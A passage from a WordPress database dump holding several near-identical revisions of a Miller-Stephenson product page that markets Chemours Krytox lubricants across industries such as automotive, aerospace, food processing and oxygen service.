lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:55:58', '2016-09-28 16:55:58', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2080, 2, '2016-09-28 16:57:07', '2016-09-28 16:57:07', '[row ]\r\n\r\n[col span="2/4" ]\r\nInsert content here...\r\n\r\n[/col]\r\n[col span="1/4" ]\r\nInsert content here...\r\n\r\n[/col]\r\n[col span="1/4" ]\r\nInsert content here...\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n&nbsp;\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 16:57:07', '2016-09-28 16:57:07', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2081, 2, '2016-09-28 16:58:04', '2016-09-28 16:58:04', '&nbsp;\r\n\r\n[ux_featured_products products="" columns="4" title="Check our Featured products!"]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use 